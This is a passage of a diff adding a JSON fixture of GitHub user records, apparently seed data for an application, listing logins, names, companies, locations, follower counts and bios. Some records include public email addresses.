"MDQ6VXNlcjIzNzQ2Mg==", + "bio": "", + "is_hireable": false, + "twitter_username": "hboutemy" + } +}, +{ + "model": "github.user", + "pk": 1313, + "fields": { + "nest_created_at": "2024-09-11T23:19:11.047Z", + "nest_updated_at": "2024-09-11T23:19:11.047Z", + "name": "Boris Ivanov", + "login": "bors2908", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/68551130?v=4", + "company": "", + "location": "Georgia", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2020-07-20T14:01:54Z", + "updated_at": "2024-09-03T15:08:45Z", + "node_id": "MDQ6VXNlcjY4NTUxMTMw", + "bio": "Junk, forks and shared stuff.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1314, + "fields": { + "nest_created_at": "2024-09-11T23:19:11.887Z", + "nest_updated_at": "2024-09-11T23:19:11.887Z", + "name": "Son Nguyen Ba", + "login": "sonnb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1698122?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2012-05-02T08:39:18Z", + "updated_at": "2024-08-25T05:35:14Z", + "node_id": "MDQ6VXNlcjE2OTgxMjI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1315, + "fields": { + "nest_created_at": "2024-09-11T23:19:13.165Z", + "nest_updated_at": "2024-09-11T23:19:13.165Z", + "name": "wvl", + "login": "wleese", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2562645?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 54, + "created_at": "2012-10-15T08:48:06Z", + "updated_at": "2024-08-13T07:53:50Z", + "node_id": "MDQ6VXNlcjI1NjI2NDU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1316, + "fields": { + "nest_created_at": "2024-09-11T23:19:15.329Z", + "nest_updated_at": "2024-09-22T18:48:44.041Z", + "name": "Tobias Langer", + "login": "empwilli", + "email": "empwilli@googlemail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/10295478?v=4", + "company": "", + "location": "Erlangen @ Germany", + "collaborators_count": 0, + "following_count": 24, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2014-12-25T09:26:38Z", + "updated_at": "2024-08-14T07:23:14Z", + "node_id": "MDQ6VXNlcjEwMjk1NDc4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1317, + "fields": { + "nest_created_at": "2024-09-11T23:19:16.591Z", + "nest_updated_at": "2024-09-22T18:49:28.308Z", + "name": "Sergey Khokhlov", + "login": "skhokhlov", + "email": "me@skhlv.nyc", + "avatar_url": "https://avatars.githubusercontent.com/u/1503649?v=4", + "company": "@citi", + "location": "London", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 13, + "public_gists_count": 15, + "public_repositories_count": 26, + "created_at": "2012-03-05T16:58:39Z", + "updated_at": "2024-09-09T10:24:13Z", + "node_id": "MDQ6VXNlcjE1MDM2NDk=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1318, + "fields": { + "nest_created_at": "2024-09-11T23:19:17.853Z", + "nest_updated_at": "2024-09-22T18:45:26.022Z", + "name": "Julien Graglia", + "login": "jgraglia", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/754914?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 5, + "public_gists_count": 10, + "public_repositories_count": 28, + "created_at": "2011-04-27T15:14:02Z", + "updated_at": "2024-09-01T08:52:17Z", + "node_id": "MDQ6VXNlcjc1NDkxNA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1319, + "fields": { + "nest_created_at": "2024-09-11T23:19:27.952Z", + "nest_updated_at": "2024-09-11T23:19:27.952Z", + "name": "", + "login": "tarakg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16776582?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2016-01-19T11:17:59Z", + "updated_at": "2022-06-14T23:36:07Z", + "node_id": "MDQ6VXNlcjE2Nzc2NTgy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1320, + "fields": { + "nest_created_at": "2024-09-11T23:19:33.460Z", + "nest_updated_at": "2024-09-12T01:26:31.414Z", + "name": "", + "login": "sitraj", + "email": "shounakitraj@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/25792555?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 9, + "created_at": "2017-02-15T11:24:04Z", + "updated_at": "2024-07-06T17:16:13Z", + "node_id": "MDQ6VXNlcjI1NzkyNTU1", + "bio": "Software Security", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1321, + "fields": { + "nest_created_at": "2024-09-11T23:19:38.431Z", + "nest_updated_at": "2024-09-12T01:24:50.392Z", + "name": "Henrik Binggl", + "login": "bihe", + "email": "henrik.binggl@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/635852?v=4", + "company": "", + "location": "Austria > Hallein", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 7, + "public_gists_count": 8, + "public_repositories_count": 49, + "created_at": "2011-02-24T11:58:32Z", + "updated_at": "2024-08-28T11:21:38Z", + "node_id": "MDQ6VXNlcjYzNTg1Mg==", + "bio": "Technology Enthusiast && SwDevNerd", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1322, + "fields": { + "nest_created_at": "2024-09-11T23:19:39.691Z", + "nest_updated_at": "2024-09-11T23:19:39.691Z", + "name": "Bryan Stadick", + "login": "bstadick", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2057235?v=4", + "company": "", + "location": "Minneapolis, MN", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2012-07-28T16:28:14Z", + "updated_at": "2024-09-05T14:57:07Z", + "node_id": "MDQ6VXNlcjIwNTcyMzU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1323, + "fields": { + "nest_created_at": "2024-09-11T23:19:42.603Z", + "nest_updated_at": "2024-09-22T19:42:21.729Z", + "name": "", + "login": "rkg-mm", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12029804?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2015-04-20T08:06:50Z", + "updated_at": "2023-12-10T19:19:52Z", + "node_id": "MDQ6VXNlcjEyMDI5ODA0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1324, + "fields": { + "nest_created_at": "2024-09-11T23:19:43.573Z", + "nest_updated_at": "2024-09-22T19:42:26.229Z", + "name": "Alastair McFarlane", + "login": "alitheg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/450789?v=4", + "company": "@DuneTech", + "location": "Edinburgh", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 8, + "public_gists_count": 2, + "public_repositories_count": 32, + "created_at": "2010-10-23T10:53:27Z", + "updated_at": "2024-09-05T16:49:02Z", + "node_id": "MDQ6VXNlcjQ1MDc4OQ==", + "bio": "CTO at @DuneTech\r\n", + "is_hireable": false, + "twitter_username": "alitheg" + } +}, +{ + "model": "github.user", + "pk": 1325, + "fields": { + "nest_created_at": "2024-09-11T23:19:47.283Z", + "nest_updated_at": "2024-09-22T18:45:40.924Z", + "name": "Harald Sømnes Hanssen", + "login": "verzada", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10551898?v=4", + "company": "", + "location": "Tromsø", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2015-01-15T19:31:46Z", + "updated_at": "2024-08-19T09:49:10Z", + "node_id": "MDQ6VXNlcjEwNTUxODk4", + "bio": "A .Net developer living in Tromsø. \r\n", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1326, + "fields": { + "nest_created_at": "2024-09-11T23:19:48.556Z", + "nest_updated_at": "2024-09-22T18:47:02.824Z", + "name": "Alexander Alzate", + "login": "mr-zepol", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/21176019?v=4", + "company": "@sonatype", + "location": "Colombia", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2016-08-22T14:19:46Z", + "updated_at": "2024-07-19T21:27:51Z", + "node_id": "MDQ6VXNlcjIxMTc2MDE5", + "bio": "Software Engineer", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1327, + "fields": { + "nest_created_at": "2024-09-11T23:19:51.139Z", + "nest_updated_at": "2024-09-11T23:19:51.139Z", + "name": "", + "login": "LapNik", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/73829722?v=4", + "company": "M-Files", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-11-02T11:44:55Z", + "updated_at": "2024-05-06T07:51:41Z", + "node_id": "MDQ6VXNlcjczODI5NzIy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1328, + "fields": { + "nest_created_at": "2024-09-11T23:19:52.370Z", + "nest_updated_at": "2024-09-22T18:45:39.958Z", + "name": "Chris Blyth", + "login": "BlythMeister", + "email": "blythmeister@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1046836?v=4", + "company": "@15below", + "location": "Lewes, UK", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 24, + "public_gists_count": 13, + "public_repositories_count": 53, + "created_at": "2011-09-13T09:17:55Z", + "updated_at": "2024-09-13T11:37:44Z", + "node_id": "MDQ6VXNlcjEwNDY4MzY=", + "bio": "Build & Deployment Manager @15below ", + "is_hireable": false, + "twitter_username": "BlythMeister" + } +}, +{ + "model": "github.user", + "pk": 1329, + "fields": { + "nest_created_at": "2024-09-11T23:19:53.623Z", + "nest_updated_at": "2024-09-11T23:19:53.623Z", + "name": "Adam C", + "login": "curnsey", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11788574?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2015-04-03T17:34:10Z", + "updated_at": "2023-02-08T14:49:05Z", + "node_id": "MDQ6VXNlcjExNzg4NTc0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1330, + "fields": { + "nest_created_at": "2024-09-11T23:19:54.900Z", + "nest_updated_at": "2024-09-22T07:43:03.651Z", + "name": "Philipp Ranft", + "login": "philipp-ranft", + "email": "philipp.ranft@kaleris.com", + "avatar_url": "https://avatars.githubusercontent.com/u/47754264?v=4", + "company": "Kaleris | Navis", + "location": "Flensburg, Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-02-18T17:23:30Z", + "updated_at": "2024-05-27T15:33:19Z", + "node_id": "MDQ6VXNlcjQ3NzU0MjY0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1331, + "fields": { + "nest_created_at": "2024-09-11T23:19:56.533Z", + "nest_updated_at": "2024-09-22T18:49:16.499Z", + "name": "Michael Tsfoni", + "login": "mtsfoni", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/80639729?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2021-03-14T16:46:52Z", + "updated_at": "2024-09-18T12:10:28Z", + "node_id": "MDQ6VXNlcjgwNjM5NzI5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1332, + "fields": { + "nest_created_at": "2024-09-11T23:19:57.370Z", + "nest_updated_at": "2024-09-22T18:45:59.552Z", + "name": "Bert", + "login": "Bertk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2315215?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2012-09-10T06:05:02Z", + "updated_at": "2024-09-14T06:35:48Z", + "node_id": "MDQ6VXNlcjIzMTUyMTU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1333, + "fields": { + "nest_created_at": "2024-09-11T23:19:58.628Z", + "nest_updated_at": "2024-09-11T23:19:58.628Z", + "name": "Tristan Milnthorp", + "login": "tmilnthorp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5693174?v=4", + "company": "Ansys, Inc.", + "location": "Pittsburgh, PA, USA", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2013-10-15T16:50:58Z", + "updated_at": "2024-07-08T13:35:00Z", + "node_id": "MDQ6VXNlcjU2OTMxNzQ=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1334, + "fields": { + "nest_created_at": "2024-09-11T23:19:59.905Z", + "nest_updated_at": "2024-09-11T23:19:59.905Z", + "name": "", + "login": "cwa-dr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/126168929?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-02-23T12:47:09Z", + "updated_at": "2024-07-05T05:47:09Z", + "node_id": "U_kgDOB4UvYQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1335, + "fields": { + "nest_created_at": "2024-09-11T23:20:01.179Z", + "nest_updated_at": "2024-09-11T23:20:01.179Z", + "name": "", + "login": "gkrishna240988", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92298117?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-10-11T08:14:41Z", + "updated_at": "2024-05-08T06:56:41Z", + "node_id": "U_kgDOBYBbhQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1336, + "fields": { + "nest_created_at": "2024-09-11T23:20:02.450Z", + "nest_updated_at": "2024-09-22T18:45:50.164Z", + "name": "Alberto Monteiro", + "login": "AlbertoMonteiro", + "email": "alberto.monteiro@live.com", + "avatar_url": "https://avatars.githubusercontent.com/u/836496?v=4", + "company": "Banco Carrefour", + "location": "Fotaleza", + "collaborators_count": 0, + "following_count": 93, + "followers_count": 221, + "public_gists_count": 131, + "public_repositories_count": 209, + "created_at": "2011-06-08T02:19:05Z", + "updated_at": "2024-08-27T11:33:48Z", + "node_id": "MDQ6VXNlcjgzNjQ5Ng==", + "bio": "I am Software Architect, whose main area of knowledge are in .NET with C#, writing Web Apps deploying in Cloud.", + "is_hireable": false, + "twitter_username": "AIbertoMonteiro" + } +}, +{ + "model": "github.user", + "pk": 1337, + "fields": { + "nest_created_at": "2024-09-11T23:20:03.678Z", + "nest_updated_at": "2024-09-11T23:20:03.678Z", + "name": "", + "login": "msherms2", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/100243291?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-02-22T22:37:11Z", + "updated_at": "2024-06-13T20:48:34Z", + "node_id": "U_kgDOBfmXWw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1338, + "fields": { + "nest_created_at": "2024-09-11T23:20:05.369Z", + "nest_updated_at": "2024-09-11T23:20:05.369Z", + "name": "Thomas Hauser", + "login": "thomashauser", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16082684?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2015-11-30T12:51:48Z", + "updated_at": "2024-03-25T18:16:54Z", + "node_id": "MDQ6VXNlcjE2MDgyNjg0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1339, + "fields": { + "nest_created_at": "2024-09-11T23:20:24.767Z", + "nest_updated_at": "2024-09-22T18:46:00.795Z", + "name": "James Thompson", + "login": "thompson-tomo", + "email": "wemicroit@outlook.com", + "avatar_url": "https://avatars.githubusercontent.com/u/19771933?v=4", + "company": "@wemicroit ", + "location": "Melbourne, Victoria, Australia", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 152, + "created_at": "2016-06-06T06:53:31Z", + "updated_at": "2024-09-03T06:43:17Z", + "node_id": "MDQ6VXNlcjE5NzcxOTMz", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1340, + "fields": { + "nest_created_at": "2024-09-11T23:20:30.907Z", + "nest_updated_at": "2024-09-11T23:20:30.907Z", + "name": "Götz Tibor", + "login": "gotztibor", + "email": "gotz.tibor@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/24914675?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2017-01-04T11:41:39Z", + "updated_at": "2023-11-24T20:13:38Z", + "node_id": "MDQ6VXNlcjI0OTE0Njc1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1341, + "fields": { + "nest_created_at": "2024-09-11T23:20:32.560Z", + "nest_updated_at": "2024-09-11T23:20:32.560Z", + "name": "Kieran Foot", + "login": "KieranFoot", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5846535?v=4", + "company": "ConnX Business Solutiond Ltd", + "location": "United Kingdom", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2013-11-03T23:51:57Z", + "updated_at": "2024-09-04T08:31:51Z", + "node_id": "MDQ6VXNlcjU4NDY1MzU=", + "bio": "Lead Software Developer", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1342, + "fields": { + "nest_created_at": "2024-09-11T23:20:35.488Z", + "nest_updated_at": "2024-09-22T18:45:49.823Z", + "name": "Andrei Chasovskikh", + "login": "andreycha", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1696046?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 27, + "public_gists_count": 3, + "public_repositories_count": 18, + "created_at": "2012-05-01T16:56:07Z", + "updated_at": "2024-08-06T10:44:27Z", + "node_id": "MDQ6VXNlcjE2OTYwNDY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1343, + "fields": { + "nest_created_at": "2024-09-11T23:20:38.808Z", + "nest_updated_at": "2024-09-11T23:20:38.808Z", + "name": "Bronislav S.", + "login": "Recurse-blip", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/64206544?v=4", + "company": "", + "location": "Ukraine", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2020-04-23T12:53:11Z", + "updated_at": "2024-06-28T14:55:56Z", + "node_id": "MDQ6VXNlcjY0MjA2NTQ0", + "bio": "DevOps - Software Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1344, + "fields": { + "nest_created_at": "2024-09-11T23:20:41.725Z", + "nest_updated_at": "2024-09-11T23:20:41.725Z", + "name": "", + "login": "Kubana", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9918282?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-11-23T19:40:40Z", + "updated_at": "2024-08-12T08:08:26Z", + "node_id": "MDQ6VXNlcjk5MTgyODI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1345, + "fields": { + "nest_created_at": "2024-09-11T23:20:43.382Z", + "nest_updated_at": "2024-09-11T23:20:43.382Z", + "name": "Volkmar Rigo", + "login": "VolkmarR", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9860916?v=4", + "company": "Infominds AG", + "location": "Bruneck, Italy", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 9, + "public_gists_count": 1, + "public_repositories_count": 41, + "created_at": "2014-11-20T08:43:17Z", + "updated_at": "2024-09-09T19:44:24Z", + "node_id": "MDQ6VXNlcjk4NjA5MTY=", + "bio": "I do things with computers... ", + "is_hireable": false, + "twitter_username": "VolkmarRigo" + } +}, +{ + "model": "github.user", + "pk": 1346, + "fields": { + "nest_created_at": "2024-09-11T23:20:45.519Z", + "nest_updated_at": "2024-09-14T19:26:51.142Z", + "name": "Peter Cullen", + "login": "petercullen68", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42790047?v=4", + "company": "Infor", + "location": "United States", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-08-29T00:44:50Z", + "updated_at": "2024-07-31T11:46:26Z", + "node_id": "MDQ6VXNlcjQyNzkwMDQ3", + "bio": "Principal S/W Engineer @ Infor Global Solutions.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1347, + "fields": { + "nest_created_at": "2024-09-11T23:20:47.237Z", + "nest_updated_at": "2024-09-18T18:56:37.143Z", + "name": "", + "login": "SagarKodam", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43883194?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-10-05T13:01:31Z", + "updated_at": "2024-03-21T06:32:24Z", + "node_id": "MDQ6VXNlcjQzODgzMTk0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1348, + "fields": { + "nest_created_at": "2024-09-11T23:21:31.931Z", + "nest_updated_at": "2024-09-11T23:21:31.931Z", + "name": "", + "login": "tucker01", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37446232?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 5, + "public_repositories_count": 6, + "created_at": "2018-03-16T13:44:52Z", + "updated_at": "2024-02-13T15:23:25Z", + "node_id": "MDQ6VXNlcjM3NDQ2MjMy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1349, + "fields": { + "nest_created_at": "2024-09-11T23:21:32.775Z", + "nest_updated_at": "2024-09-11T23:21:32.775Z", + "name": "Cameron Griffin", + "login": "electricgull", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16562085?v=4", + "company": "", + "location": "Raleigh, NC", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2016-01-05T16:36:27Z", + "updated_at": "2024-08-13T11:27:47Z", + "node_id": "MDQ6VXNlcjE2NTYyMDg1", + "bio": "Security Automation Engineer", + "is_hireable": false, + "twitter_username": "emwav" + } +}, +{ + "model": "github.user", + "pk": 1350, + "fields": { + "nest_created_at": "2024-09-11T23:21:33.592Z", + "nest_updated_at": "2024-09-11T23:21:33.592Z", + "name": "Rose Judge", + "login": "rnjudge", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12040351?v=4", + "company": "@vmware", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 78, + "public_gists_count": 0, + "public_repositories_count": 29, + "created_at": "2015-04-20T21:12:27Z", + "updated_at": "2024-09-04T11:26:56Z", + "node_id": "MDQ6VXNlcjEyMDQwMzUx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1351, + "fields": { + "nest_created_at": "2024-09-11T23:21:34.433Z", + "nest_updated_at": "2024-09-11T23:21:34.433Z", + "name": "Wessel Terpstra", + "login": "wterpstra", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4698201?v=4", + "company": "Independent", + "location": "Zuidoostbeemster, Netherlands", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2013-06-14T13:21:29Z", + "updated_at": "2024-09-05T07:46:41Z", + "node_id": "MDQ6VXNlcjQ2OTgyMDE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1352, + "fields": { + "nest_created_at": "2024-09-11T23:21:35.247Z", + "nest_updated_at": "2024-09-11T23:21:35.247Z", + "name": "Roman Ledermann", + "login": "roman-ledermann-erni", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8698772?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2014-09-08T17:06:10Z", + "updated_at": "2024-02-08T14:07:54Z", + "node_id": "MDQ6VXNlcjg2OTg3NzI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1353, + "fields": { + "nest_created_at": "2024-09-11T23:21:42.209Z", + "nest_updated_at": "2024-09-11T23:21:42.209Z", + "name": "", + "login": "zabulus", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2720011?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 4, + "public_repositories_count": 49, + "created_at": "2012-11-04T12:15:52Z", + "updated_at": "2024-07-14T03:08:04Z", + "node_id": "MDQ6VXNlcjI3MjAwMTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1354, + "fields": { + "nest_created_at": "2024-09-11T23:22:38.998Z", + "nest_updated_at": "2024-09-22T18:49:24.164Z", + "name": "Sambhav Kothari", + "login": "samj1912", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16130816?v=4", + "company": "@bloomberg", + "location": "London, UK", + "collaborators_count": 0, + "following_count": 17, + "followers_count": 256, + "public_gists_count": 36, + "public_repositories_count": 166, + "created_at": "2015-12-03T07:48:03Z", + "updated_at": "2024-09-16T04:28:31Z", + "node_id": "MDQ6VXNlcjE2MTMwODE2", + "bio": "AI Team lead and open-sourcerer. Maintainer for various CNCF and Python projects.", + "is_hireable": false, + "twitter_username": "_sambhavkothari" + } +}, +{ + "model": "github.user", + "pk": 1355, + "fields": { + "nest_created_at": "2024-09-11T23:22:43.860Z", + "nest_updated_at": "2024-09-11T23:22:43.860Z", + "name": "", + "login": "seb06cai", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16827761?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-01-21T23:49:35Z", + "updated_at": "2024-08-05T21:29:00Z", + "node_id": "MDQ6VXNlcjE2ODI3NzYx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1356, + "fields": { + "nest_created_at": "2024-09-11T23:22:46.760Z", + "nest_updated_at": "2024-09-11T23:22:46.760Z", + "name": "", + "login": "asponzan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/109351244?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-07-15T11:08:47Z", + "updated_at": "2024-07-30T15:52:13Z", + "node_id": "U_kgDOBoSRTA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1357, + "fields": { + "nest_created_at": "2024-09-11T23:22:47.579Z", + "nest_updated_at": "2024-09-22T18:53:29.495Z", + "name": "", + "login": "Nicolas-Peiffer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/102670102?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2022-03-30T12:29:57Z", + "updated_at": "2024-08-08T14:09:12Z", + "node_id": "U_kgDOBh6fFg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1358, + "fields": { + "nest_created_at": 